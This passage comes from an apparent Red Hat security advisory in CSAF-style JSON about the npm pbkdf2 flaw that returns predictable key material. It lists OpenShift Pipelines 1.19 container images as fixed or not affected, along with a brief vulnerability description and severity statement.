"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2374370"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the npm pbkdf2 library, allowing signature spoofing. When executing in javascript engines other than Nodejs or Nodejs when importing pbkdf2/browser, certain algorithms will silently fail and return invalid data. The return values are predictable, which undermines the security guarantees of the package.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pbkdf2: pbkdf2 silently returns predictable key material",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is rated important because it causes the pbkdf2 module to quietly return weak or zero-filled keys when certain algorithm names are used incorrectly in browsers or bundled code, this causes the function to silently return a predictable value (such as a zero-filled buffer or uninitialized memory) instead of a securely derived key, completely undermining the confidentiality and integrity of any cryptographic operation where attackers could guess or reuse these keys to access or change protected data.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
